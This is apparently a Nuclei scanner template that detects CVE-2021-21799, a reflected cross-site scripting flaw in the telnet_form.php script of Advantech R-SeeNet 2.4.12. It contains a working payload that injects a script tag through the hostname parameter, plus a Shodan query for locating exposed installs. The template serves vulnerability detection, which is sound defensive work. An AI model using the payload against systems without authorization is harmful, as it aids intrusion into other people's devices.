37 lines
929 B
YAML
37 lines
929 B
YAML
id: CVE-2021-21799
|
|
|
|
info:
|
|
name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality.
|
|
reference:
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
|
|
metadata:
|
|
shodan-query: http.html:"R-SeeNet"
|
|
verified: "true"
|
|
tags: xss,cve,2021,unauthenticated
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/php/telnet_form.php?hostname=</title><script>alert(1)</script><title>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(1)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|